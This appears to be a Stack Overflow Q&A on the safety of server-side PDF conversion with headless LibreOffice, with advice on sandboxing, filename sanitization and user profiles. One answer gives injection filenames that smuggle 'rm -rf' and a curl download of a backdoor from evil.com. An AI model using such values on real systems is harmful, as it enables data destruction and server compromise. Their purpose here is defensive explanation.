user875234

Reputation: 2517

Is LibreOffice (headless) safe to use on a web server?

I have my-template.docx that I convert into my-report.docx with OpenXml and then my-report.pdf with:

soffice --headless --convert-to pdf my-report.docx

I feel compelled to say that this functionality is very much appreciated 🙌. Anyway, one thing I can't find an answer to in the CLI documentation, in the comparison with MS Office, or in my other post is whether LibreOffice is safe for automation.

See this post from Microsoft that says not to use Word for server-side automation. That raises the question of whether LibreOffice is safe for server-side automation. Basically, I will be using C# to run soffice --headless --convert-to pdf my-report.docx any time a request for a report comes in.

Is that safe?

*assume nobody else is trying to read my-report.docx

Upvotes: 12

Views: 15574

Answers (3)

LSerni

Reputation: 57418

I have my-template.docx that I convert into my-report.docx with OpenXml and then my-report.pdf with:

soffice --headless --convert-to pdf my-report.docx

TL;DR: in your case, it is.

What you're almost certainly doing is replacing some information inside the DOCX and using LibreOffice to have a "nice" conversion to PDF. While there are other tools that might do something like that (wkhtmltopdf for example), you're not using LibreOffice in any vulnerable way that I'm aware of (and I use LibreOffice like you do too):

  • the source document is under your control (no user-entered macros, remote file inclusions, remote data sources or other shenanigans)
  • the values you inject into the DOCX are also under your control - or are they? - and do not contain user input such as HREF targets that might make it into the PDF.
  • LibreOffice in headless mode does not expose any open ports or interfaces that might be exploited by a third process.

Possible but unlikely "exploit" avenues that might remain:

  • the destination file. Even if you let the user choose the name of the resulting file, I expect you would still generate a unique PDF filename on the server and send the user's name only as Content-Disposition: attachment; filename="thatswhatshesaid". The risky alternative is using the user's filename on your filesystem, which could mean saving data to byebye.pdf && rm -rf ... (or irrelevant.pdf\x00; curl -o index2.php http://evil.com/backdoor.php, or ...) and then sending back a Location: downloads/whatshesaid.pdf.
  • very large values in the XML output that might trigger anomalous behaviour. The chances of this happening, and of it happening in any way that is meaningful for the attacker, are negligible, but there is nothing wrong with checking.
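
As a rough illustration of the destination-file point, here is a minimal Python sketch (the same idea carries over to C#). The function names storage_path and content_disposition, the allowed character set, and the report.pdf fallback are all assumptions of mine, not part of any framework: the file on disk gets a random server-side name, and the user's name is reduced to a conservative character set before it appears in the header.

```python
import re
import uuid
from pathlib import Path


def storage_path(download_dir: Path) -> Path:
    """Pick the on-disk name ourselves; user input never reaches the filesystem."""
    return download_dir / f"{uuid.uuid4().hex}.pdf"


def content_disposition(requested_name: str, fallback: str = "report.pdf") -> str:
    """Build a Content-Disposition value from a user-supplied display name."""
    # Replace anything outside a conservative whitelist (assumed policy).
    safe = re.sub(r"[^A-Za-z0-9._-]", "_", requested_name).strip("._")
    if not safe:
        safe = fallback
    if not safe.lower().endswith(".pdf"):
        safe += ".pdf"
    return f'attachment; filename="{safe}"'
```

With this split, a name like byebye.pdf && rm -rf ... only ever shows up, defanged, in the download header and never in a path or a command line.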

Upvotes: 5

Paul Jowett

Reputation: 6581

Moggi's answer is a great one. The only things I can add are:

  1. you can improve security by running the LibreOffice (soffice) instance in a sandbox of some sort (e.g. Docker). Should something rogue happen, the sandbox limits the potential damage,
  2. launching the process each time can become an overhead if your site gets busy generating PDFs. If that happens, a layer on top (like JODConverter) can launch LibreOffice once and reuse it for many conversions.
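
To make point 1 a little more concrete, here is a hedged Python sketch that only builds a docker run command line. The image name example/libreoffice-headless is hypothetical, and I am assuming the image has soffice on its PATH and a writable home directory for the LibreOffice profile. The memory limit is an arbitrary example value.

```python
from pathlib import Path


def build_sandboxed_command(
    work_dir: Path,
    document_name: str,
    image: str = "example/libreoffice-headless",  # hypothetical image name
) -> list[str]:
    """Build a docker run command that converts one document in a container."""
    # Only the bare file name is passed on, so "../" tricks cannot leave /work.
    name = Path(document_name).name
    return [
        "docker", "run", "--rm",
        "--network", "none",   # the conversion does not need network access
        "--memory", "1g",      # assumed limit, tune for your documents
        "--volume", f"{work_dir.resolve()}:/work",
        "--workdir", "/work",
        image,
        "soffice", "--headless", "--convert-to", "pdf", "--outdir", "/work", name,
    ]
```

Only the per-job directory is mounted, so a misbehaving conversion can touch that directory and nothing else on the host.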

I hope that helps.

Upvotes: 3

moggi

Reputation: 1486

As long as you control the content of the input file there should be no issue at all. Keep in mind that LibreOffice only allows one active instance per user profile, so if you want to be able to process more than one document in parallel you should use separate user profiles.
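
A minimal sketch of the separate-profile idea, in Python for brevity (the same argument list can be passed from C#). It relies on the -env:UserInstallation bootstrap parameter to point each run at its own throwaway profile directory. The function names and the 120-second timeout are assumptions for illustration.

```python
import subprocess
import tempfile
from pathlib import Path


def build_convert_command(source: Path, out_dir: Path, profile_dir: Path) -> list[str]:
    """Build an soffice command line that uses its own user profile."""
    return [
        "soffice",
        # A file:// URL pointing at a profile directory private to this run.
        f"-env:UserInstallation={profile_dir.resolve().as_uri()}",
        "--headless",
        "--convert-to", "pdf",
        "--outdir", str(out_dir),
        str(source),
    ]


def convert_to_pdf(source: Path, out_dir: Path, timeout_s: float = 120.0) -> Path:
    """Convert one document; parallel calls do not share a profile."""
    with tempfile.TemporaryDirectory(prefix="lo-profile-") as profile:
        cmd = build_convert_command(source, out_dir, Path(profile))
        # Arguments are passed as a list, so no shell parses the file name.
        subprocess.run(cmd, check=True, timeout=timeout_s)
    return out_dir / (source.stem + ".pdf")
```

Creating a fresh profile on every call costs some startup time. A small pool of long-lived profile directories, one per worker, would be a reasonable alternative.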

If you have untrusted input data, the whole question becomes more complex to answer. While there has been quite a bit of work on securing the code base, a desktop office suite is still a huge piece of software with a lot of potential attack surfaces (macros, remote data connections, old binary file formats, ...). While all of these features should be blocked in headless operation, you have to trust that there are no undiscovered bugs.

The remaining points in the Microsoft article should not apply to LibreOffice. The headless mode is designed not to interact with the desktop environment and, except for the user profile, does not change anything in the system or depend on any desktop-related piece. The default builds will still depend on some GUI libraries, but if that actually becomes a problem there is an experimental build option to build a non-GUI version without any X/GTK/KDE library dependencies.

As an alternative, there are also a few projects built on top of LibreOffice that try to make converting documents even easier and might actually be faster by pre-forking or using the LibreOfficeKit API. Two examples are JODConverter and unoconv.

Upvotes: 17
